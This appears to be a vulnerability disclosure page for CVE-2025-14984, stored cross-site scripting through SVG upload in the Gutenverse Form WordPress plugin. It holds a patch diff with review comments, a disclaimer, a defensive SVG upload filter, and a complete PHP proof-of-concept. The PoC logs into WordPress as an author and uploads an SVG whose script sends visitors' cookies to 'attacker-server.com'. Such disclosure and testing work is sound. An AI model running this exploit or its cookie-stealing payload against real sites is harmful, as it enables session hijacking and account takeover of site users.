 		$prev_inner_text = esc_attr( $this->attributes['paginationPrevText'] ?? '' );
 		$next_innet_text = esc_attr( $this->attributes['paginationNextText'] ?? '' );
 		$prev_icon       = esc_attr( $this->attributes['paginationPrevIcon'] ?? '' );
+		$prev_icon_type  = isset( $this->attributes['paginationPrevIconType'] ) ? esc_attr( $this->attributes['paginationPrevIconType'] ) : 'icon';
+		$prev_icon_svg   = isset( $this->attributes['paginationPrevIconSVG'] ) ? $this->attributes['paginationPrevIconSVG'] : '';
 		$next_icon       = esc_attr( $this->attributes['paginationNextIcon'] ?? '' );
+		$next_icon_type  = isset( $this->attributes['paginationNextIconType'] ) ? esc_attr( $this->attributes['paginationNextIconType'] ) : 'icon';
+		$next_icon_svg   = isset( $this->attributes['paginationNextIconSVG'] ) ? $this->attributes['paginationNextIconSVG'] : '';

 		if ( in_array( $this->attributes['paginationMode'], array( 'loadmore', 'scrollload' ), true ) && $next ) {
 			$output = '<span data-load="' . esc_attr( $this->attributes['paginationLoadmoreText'] ) . '" data-loading="' . esc_attr( $this->attributes['paginationLoadingText'] ) . '"> ' . esc_attr( $this->attributes['paginationLoadmoreText'] ) . '</span>';

-			if ( ! empty( $icon ) ) {
+			if ( ! empty( $icon ) || 'svg' === $icon_type ) {
+				$icon_html = $this->render_icon( $icon_type, $icon, $icon_svg );
 				if ( 'before' === $icon_position ) {
-					$output = '<i aria-hidden="true" class="' . $icon . '"></i>' . $output;
+					$output = $icon_html . $output;
 				} else {
-					$output = $output . '<i aria-hidden="true" class="' . $icon . '"></i>';
+					$output = $output . $icon_html;
 				}
 			}
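Review bot: the new condition `! empty( $icon ) || 'svg' === $icon_type` is true when the type is `svg` but `paginationIconSVG` is empty, and `render_icon()` then falls back to its `<i>` branch with an empty class, so an empty icon element is added to the load-more button. Check `! empty( $icon_svg )` together with the type. Note also that `$icon_svg`, `$prev_icon_svg` and `$next_icon_svg` are read from block attributes with no validation at this boundary and are handed to `render_icon()` as they are.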

@@ -743,12 +750,12 @@
 			$next = $next ? '' : 'disabled';
 			$prev = $prev ? '' : 'disabled';

-			$prev_text = '<i class="' . $prev_icon . '"></i>';
-			$next_text = '<i class="' . $next_icon . '"></i>';
+			$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg );
+			$next_text = $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );

 			if ( $pre_next_text && 'false' !== $pre_next_text ) {
-				$prev_text = '<i class="' . $prev_icon . '"></i> ' . $prev_inner_text;
-				$next_text = $next_innet_text . '  <i class="' . $next_icon . '"></i>';
+				$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg ) . ' ' . $prev_inner_text;
+				$next_text = $next_innet_text . '  ' . $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );
 			}

 			$prev_link = 1 === $page ? '' : '<a href="#" class="btn-pagination prev ' . esc_attr( $prev ) . '" title="' . $prev_inner_text . '">' . $prev_text . '</a>';
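Review bot: `render_icon()` is called for `$prev_text` and `$next_text` and then called again with identical arguments inside the `if ( $pre_next_text ... )` branch, a pattern repeated in the `number`, `normal-prevnext` and `normal-number` hunks that follow. Build the two icon strings once at the top of `render_pagination()` and reuse them, which also keeps any later validation of the SVG data in a single place.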
@@ -762,12 +769,12 @@
 		}

 		if ( 'number' === $this->attributes['paginationMode'] && $total > 1 ) {
-			$prev_text = '<i class="' . $prev_icon . '"></i>';
-			$next_text = '<i class="' . $next_icon . '"></i>';
+			$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg );
+			$next_text = $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );

 			if ( $pre_next_text && 'false' !== $pre_next_text ) {
-				$prev_text = '<i class="' . $prev_icon . '"></i> ' . esc_html__( 'Prev', 'gutenverse-form' );
-				$next_text = $next_innet_text . '  <i class="' . $next_icon . '"></i>';
+				$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg ) . ' ' . esc_html__( 'Prev', 'gutenverse-form' );
+				$next_text = $next_innet_text . '  ' . $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );
 			}

 			$output = '<div class="guten_block_nav" data-page="' . $page . '">';
@@ -815,12 +822,12 @@
 			$prev_class = $prev ? '' : 'disabled';
 			$next_class = $next ? '' : 'disabled';

-			$prev_text = '<i class="' . $prev_icon . '"></i>';
-			$next_text = '<i class="' . $next_icon . '"></i>';
+			$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg );
+			$next_text = $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );

 			if ( $pre_next_text && 'false' !== $pre_next_text ) {
-				$prev_text = '<i class="' . $prev_icon . '"></i> ' . $prev_inner_text;
-				$next_text = $next_innet_text . '  <i class="' . $next_icon . '"></i>';
+				$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg ) . ' ' . $prev_inner_text;
+				$next_text = $next_innet_text . '  ' . $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );
 			}

 			$prev_link = 1 === $page ? '' : sprintf(
@@ -852,12 +859,12 @@

 		// Normal Number Pagination (Native).
 		if ( 'normal-number' === $this->attributes['paginationMode'] && $total > 1 ) {
-			$prev_text = '<i class="' . $prev_icon . '"></i>';
-			$next_text = '<i class="' . $next_icon . '"></i>';
+			$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg );
+			$next_text = $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );

 			if ( $pre_next_text && 'false' !== $pre_next_text ) {
-				$prev_text = '<i class="' . $prev_icon . '"></i> ' . esc_html__( 'Prev', 'gutenverse-form' );
-				$next_text = $next_innet_text . '  <i class="' . $next_icon . '"></i>';
+				$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg ) . ' ' . esc_html__( 'Prev', 'gutenverse-form' );
+				$next_text = $next_innet_text . '  ' . $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );
 			}

 			$output = '<div class="guten_block_nav native-pagination" data-page="' . $page . '">';
--- a/gutenverse-form/lib/framework/includes/class-api.php
+++ b/gutenverse-form/lib/framework/includes/class-api.php
@@ -167,6 +167,16 @@
 			)
 		);

+		register_rest_route(
+			self::ENDPOINT,
+			'image-sizes',
+			array(
+				'methods'             => 'GET',
+				'callback'            => array( $this, 'get_image_sizes' ),
+				'permission_callback' => 'gutenverse_permission_check_author',
+			)
+		);
+
 		// Template Library.
 		register_rest_route(
 			self::ENDPOINT,
@@ -1905,4 +1915,31 @@

 		return null;
 	}
+
+	/**
+	 * Get Image Sizes.
+	 *
+	 * @return WP_REST_Response
+	 */
+	public function get_image_sizes() {
+		$sizes             = wp_get_registered_image_subsizes();
+		$image_sizes       = array();
+		$excluded_defaults = array( 'medium_large', '1536x1536', '2048x2048' );
+
+		foreach ( $sizes as $slug => $size ) {
+			if ( ! in_array( $slug, $excluded_defaults, true ) ) {
+				$image_sizes[] = array(
+					'label' => ucwords( str_replace( '-', ' ', $slug ) ) . ' (' . $size['width'] . 'x' . $size['height'] . ')',
+					'value' => $slug,
+				);
+			}
+		}
+
+		$image_sizes[] = array(
+			'label' => 'Full',
+			'value' => 'full',
+		);
+
+		return new WP_REST_Response( $image_sizes, 200 );
+	}
 }
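Review bot: in `get_image_sizes()` the labels are built from the raw slug via `ucwords( str_replace( '-', ' ', $slug ) )` and the literal `'Full'`, so none of them is translatable, while other strings in this patch go through `esc_html__( ..., 'gutenverse-form' )`. Wrap the fixed label in `__()` and consider mapping the core size slugs to translated names. The docblock could also state that the route is restricted by `gutenverse_permission_check_author`, since the method itself performs no capability check.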
--- a/gutenverse-form/lib/framework/includes/class-assets.php
+++ b/gutenverse-form/lib/framework/includes/class-assets.php
@@ -139,7 +139,7 @@
 		wp_register_style(
 			'gutenverse-frontend-style',
 			GUTENVERSE_FRAMEWORK_URL_PATH .

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14984 - Gutenverse Form <= 2.3.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload

<?php
/**
 * Proof of Concept for CVE-2025-14984
 * Requires valid WordPress author credentials
 * Uploads malicious SVG with JavaScript payload
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
$username = 'author_user'; // CHANGE THIS
$password = 'author_pass'; // CHANGE THIS

// Malicious SVG with JavaScript payload
$svg_payload = '<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">
  <script type="text/javascript">
    // XSS payload - exfiltrate cookies to attacker server
    var img = new Image();
    img.src = "https://attacker-server.com/steal?c=" + encodeURIComponent(document.cookie);
  </script>
  <rect width="100" height="100" fill="red"/>
  <text x="20" y="50" fill="white">Atomic Edge PoC</text>
</svg>';

// Create temporary file
$temp_file = tempnam(sys_get_temp_dir(), 'svg_');
file_put_contents($temp_file, $svg_payload);

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$login_response = curl_exec($ch);

// Check login success by looking for dashboard
if (strpos($login_response, 'wp-admin') === false) {
    echo "[!] Login failed. Check credentials.\n";
    exit;
}

echo "[+] Successfully logged in as $username\n";

// Get nonce for media upload (from media library page)
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/media-new.php');
$media_page = curl_exec($ch);

// Extract upload nonce (pattern may vary)
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $media_page, $nonce_matches);
if (empty($nonce_matches[1])) {
    // Try alternative nonce pattern
    preg_match('/"plupload":{"_wpnonce":"([a-f0-9]+)"/', $media_page, $nonce_matches);
}

if (empty($nonce_matches[1])) {
    echo "[!] Could not extract upload nonce. Trying direct upload anyway.\n";
    $nonce = '';
} else {
    $nonce = $nonce_matches[1];
    echo "[+] Found upload nonce: $nonce\n";
}

// Prepare file upload via async-upload.php
$post_data = [
    'name' => 'atomic_edge_poc.svg',
    'action' => 'upload-attachment',
    '_wpnonce' => $nonce
];

$file_data = [
    'async-upload' => new CURLFile($temp_file, 'image/svg+xml', 'atomic_edge_poc.svg')
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/async-upload.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($post_data, $file_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: multipart/form-data']);

$upload_response = curl_exec($ch);
curl_close($ch);

// Clean up temp file
unlink($temp_file);

// Parse response
if (strpos($upload_response, '"success":true') !== false) {
    // Extract uploaded file URL
    preg_match('/"url":"([^"]+)"/', $upload_response, $url_matches);
    if (!empty($url_matches[1])) {
        $svg_url = stripslashes($url_matches[1]);
        echo "[+] Malicious SVG uploaded successfully!\n";
        echo "[+] File URL: $svg_url\n";
        echo "[+] When viewed, this SVG will execute JavaScript in the victim's browser\n";
    } else {
        echo "[+] Upload successful but could not parse URL. Response: $upload_response\n";
    }
} else {
    echo "[!] Upload failed. Response: $upload_response\n";
    echo "[!] The site may be patched or have additional security controls.\n";
}
?>
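
The control the analysis describes as missing, sketched as an added example that is neither the plugin's code nor its 2.4.0 patch: a `wp_handle_upload_prefilter` callback that parses an uploaded SVG and rejects it when it carries script elements, event-handler attributes or `javascript:` links. The `example_*` function names are hypothetical.

```php
<?php
// Added example, not Gutenverse code. The example_* names are hypothetical.
// Returns true when the SVG markup contains script-capable content.
function example_svg_has_active_content( string $xml ): bool {
	// A DTD can define entities that hide markup from the checks below.
	// Some legitimate exports carry a DOCTYPE and would need it stripped first.
	if ( false !== stripos( $xml, '<!DOCTYPE' ) || false !== stripos( $xml, '<!ENTITY' ) ) {
		return true;
	}
	$dom  = new DOMDocument();
	$prev = libxml_use_internal_errors( true );
	$ok   = $dom->loadXML( $xml, LIBXML_NONET ); // No network access while parsing.
	libxml_clear_errors();
	libxml_use_internal_errors( $prev );
	if ( ! $ok ) {
		return true; // Unparseable XML is treated as unsafe.
	}
	$blocked = array( 'script', 'foreignobject', 'iframe', 'embed', 'object' );
	foreach ( $dom->getElementsByTagName( '*' ) as $el ) {
		if ( in_array( strtolower( $el->localName ), $blocked, true ) ) {
			return true;
		}
		foreach ( $el->attributes as $attr ) {
			$name  = strtolower( $attr->localName ); // xlink:href becomes href.
			$value = strtolower( preg_replace( '/[\s\x00-\x20]+/', '', $attr->value ) );
			if ( 0 === strpos( $name, 'on' ) ) {
				return true; // Event handlers such as onload.
			}
			if ( 'href' === $name && 0 === strpos( $value, 'javascript:' ) ) {
				return true;
			}
		}
	}
	return false;
}
// Filter callback: WordPress aborts the upload when 'error' is set to a message.
function example_reject_active_svg( array $file ): array {
	$ext = strtolower( pathinfo( $file['name'], PATHINFO_EXTENSION ) );
	if ( 'svg' !== $ext && 'image/svg+xml' !== $file['type'] ) {
		return $file;
	}
	$xml = file_get_contents( $file['tmp_name'] );
	if ( false === $xml || example_svg_has_active_content( $xml ) ) {
		$file['error'] = 'SVG rejected: it contains script or other active content.';
	}
	return $file;
}
// Register only inside WordPress so the checker can also be loaded from the CLI.
if ( function_exists( 'add_filter' ) ) {
	add_filter( 'wp_handle_upload_prefilter', 'example_reject_active_svg' );
}
```

This check is a denylist that rejects files rather than cleaning them; an allowlist-based SVG sanitizer is stricter, and SVGs already in the media library before the check was installed still need to be reviewed.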
